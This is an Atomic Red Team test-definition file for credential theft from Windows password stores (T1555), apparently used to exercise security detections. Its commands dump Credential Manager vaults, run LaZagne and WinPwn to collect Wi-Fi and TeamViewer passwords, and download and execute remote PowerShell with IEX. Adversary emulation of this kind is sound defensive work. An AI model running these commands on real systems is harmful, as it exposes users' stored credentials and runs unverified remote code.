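# Atomic Red Team test definitions for T1555 (Credentials from Password Stores).
# Every test below reads credential material on the host it runs on, so run them
# only on lab systems. Several tests download a PowerShell helper at run time and
# execute it with IEX: whatever the fetched revision contains runs with the
# invoking user's rights, so review the pinned revision before use and expect
# AV/EDR to alert on or block some of these tests.
attack_technique: T1555
display_name: 'Credentials from Password Stores'
atomic_tests: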
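- name: Extract Windows Credential Manager via VBA
  auto_generated_guid: 234f9b7c-b53d-4f32-897b-b880a6c9ea7b
  description: |
    This module will extract the credentials found within the Windows credential manager and dump
    them to $env:TEMP\windows-credentials.txt
  supported_platforms:
  - windows
  dependency_executor_name: powershell
  dependencies:
  - description: |
      Microsoft Word must be installed
    # Creates a Word COM instance to prove Word is installed and closes that one
    # instance with Quit(). The earlier `Stop-Process -Name winword` would have
    # killed every Word process on the host, including documents the user had
    # open, which is unacceptable collateral for a prerequisite check.
    prereq_command: |
      try {
        $word = New-Object -COMObject "word.Application"
        $word.Quit()
        exit 0
      } catch { exit 1 }
    get_prereq_command: |
      Write-Host "You will need to install Microsoft Word manually to meet this requirement"
  executor:
    # Invoke-MalDoc.ps1 is fetched from the 'master' branch, not a pinned commit,
    # and executed with IEX, so whatever that file contains at run time is what
    # runs. The other remote-fetch tests in this file pin a commit SHA; do the
    # same here (or vendor the helper) before running outside a lab. The macro
    # then writes the credential dump to $env:TEMP\windows-credentials.txt.
    command: |
      [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
      IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
      Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1555\src\T1555-macrocode.txt" -officeProduct "Word" -sub "Extract"
    # Deletes the dump file; -ErrorAction Ignore keeps cleanup quiet when the
    # test never got as far as writing it.
    cleanup_command: |
      Remove-Item "$env:TEMP\windows-credentials.txt" -ErrorAction Ignore
    name: powershell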
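- name: Dump credentials from Windows Credential Manager With PowerShell [windows Credentials]
  auto_generated_guid: c89becbe-1758-4e7d-a0f4-97d2188a23e3
  description: This module will extract the credentials stored in the Windows Credentials vault of Windows Credential Manager
  supported_platforms:
  - windows
  executor:
    name: powershell
    # Runs as the invoking user against that user's own vault; nothing here
    # claims access to other users' credentials.
    elevation_required: false
    # The helper is pinned to a commit SHA, but it is still downloaded and
    # executed with IEX at run time with no integrity check of the bytes
    # received. TLS 1.2 is pinned first, as the VBA test in this file does,
    # because older Windows PowerShell defaults may otherwise fail the GitHub
    # download. No cleanup_command is defined, which suggests output is
    # console-only -- confirm against the helper script before relying on that.
    command: |
      [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
      IEX (IWR 'https://raw.githubusercontent.com/TriggerMan-S/Windows-Credential-Manager/4ad208e70c80dd2a9961db40793da291b1981e01/GetCredmanCreds.ps1' -UseBasicParsing); Get-PasswordVaultCredentials -Force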
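- name: Dump credentials from Windows Credential Manager With PowerShell [web Credentials]
  auto_generated_guid: 8fd5a296-6772-4766-9991-ff4e92af7240
  description: This module will extract the credentials stored in the Web Credentials vault of Windows Credential Manager
  supported_platforms:
  - windows
  executor:
    name: powershell
    # Runs as the invoking user against that user's own vault; nothing here
    # claims access to other users' credentials.
    elevation_required: false
    # Same helper and commit SHA as the Windows Credentials test, still fetched
    # and executed with IEX at run time with no integrity check of the bytes
    # received. TLS 1.2 is pinned first, as the VBA test in this file does,
    # because older Windows PowerShell defaults may otherwise fail the GitHub
    # download. No cleanup_command is defined, which suggests output is
    # console-only -- confirm against the helper script before relying on that.
    command: |
      [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
      IEX (IWR 'https://raw.githubusercontent.com/TriggerMan-S/Windows-Credential-Manager/4ad208e70c80dd2a9961db40793da291b1981e01/GetCredmanCreds.ps1' -UseBasicParsing); Get-CredManCreds -Force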
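- name: Enumerate credentials from Windows Credential Manager using vaultcmd.exe [Windows Credentials]
  auto_generated_guid: 36753ded-e5c4-4eb5-bc3c-e8fba236878d
  description: This module will enumerate credentials stored in the Windows Credentials vault of Windows Credential Manager using the built-in utility vaultcmd.exe
  supported_platforms:
  - windows
  executor:
    name: powershell
    elevation_required: false
    # Built-in binary, no download. `vaultcmd /listcreds ... /all` lists the
    # vault entries (resource, identity, saved-by) but does not display the
    # stored secret itself, so this is enumeration rather than a dump; nothing
    # is written to disk, hence no cleanup_command.
    command: |
      vaultcmd /listcreds:"Windows Credentials" /all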
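- name: Enumerate credentials from Windows Credential Manager using vaultcmd.exe [Web Credentials]
  auto_generated_guid: bc071188-459f-44d5-901a-f8f2625b2d2e
  description: This module will enumerate credentials stored in the Web Credentials vault of Windows Credential Manager using the built-in utility vaultcmd.exe
  supported_platforms:
  - windows
  executor:
    name: powershell
    elevation_required: false
    # Built-in binary, no download. `vaultcmd /listcreds ... /all` lists the
    # vault entries (resource, identity, saved-by) but does not display the
    # stored secret itself, so this is enumeration rather than a dump; nothing
    # is written to disk, hence no cleanup_command.
    command: |
      vaultcmd /listcreds:"Web Credentials" /all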
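- name: WinPwn - Loot local Credentials - lazagne
  auto_generated_guid: 079ee2e9-6f16-47ca-a635-14efcd994118
  description: |-
    The [LaZagne project](https://github.com/AlessandroZ/LaZagne) is an open source application used to retrieve many of the passwords stored on a local computer.
    Each application stores its passwords differently (plaintext, APIs, custom algorithms, databases, etc.).
    This tool was developed to recover those passwords for the most commonly used software.
  supported_platforms:
  - windows
  executor:
    # WinPwn.ps1 is pinned to a commit SHA but is still downloaded and executed
    # with IEX at run time with no integrity check of the bytes received. TLS
    # 1.2 is pinned first, as the VBA test in this file does, because older
    # Windows PowerShell defaults may otherwise fail the GitHub download. The
    # lazagnemodule function then runs LaZagne, which is widely signatured;
    # expect AV/EDR to quarantine it. -consoleoutput -noninteractive are
    # WinPwn's own switches; their exact semantics are not documented here.
    command: |-
      [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
      iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
      lazagnemodule -consoleoutput -noninteractive
    name: powershell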
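- name: WinPwn - Loot local Credentials - Wifi Credentials
  auto_generated_guid: afe369c2-b42e-447f-98a3-fb1f4e2b8552
  description: Loot local credentials - Wi-Fi credentials technique via the wificreds function of WinPwn
  supported_platforms:
  - windows
  executor:
    # WinPwn.ps1 is pinned to a commit SHA but is still downloaded and executed
    # with IEX at run time with no integrity check of the bytes received. TLS
    # 1.2 is pinned first, as the VBA test in this file does, because older
    # Windows PowerShell defaults may otherwise fail the GitHub download.
    # -consoleoutput -noninteractive are WinPwn's own switches; their exact
    # semantics are not documented here.
    command: |-
      [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
      iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
      wificreds -consoleoutput -noninteractive
    name: powershell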
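- name: WinPwn - Loot local Credentials - Decrypt Teamviewer Passwords
  auto_generated_guid: db965264-3117-4bad-b7b7-2523b7856b92
  description: Loot local credentials - Decrypt TeamViewer passwords technique via the decryptteamviewer function of WinPwn
  supported_platforms:
  - windows
  executor:
    # WinPwn.ps1 is pinned to a commit SHA but is still downloaded and executed
    # with IEX at run time with no integrity check of the bytes received. TLS
    # 1.2 is pinned first, as the VBA test in this file does, because older
    # Windows PowerShell defaults may otherwise fail the GitHub download.
    # -consoleoutput -noninteractive are WinPwn's own switches; their exact
    # semantics are not documented here.
    command: |-
      [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
      iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
      decryptteamviewer -consoleoutput -noninteractive
    name: powershell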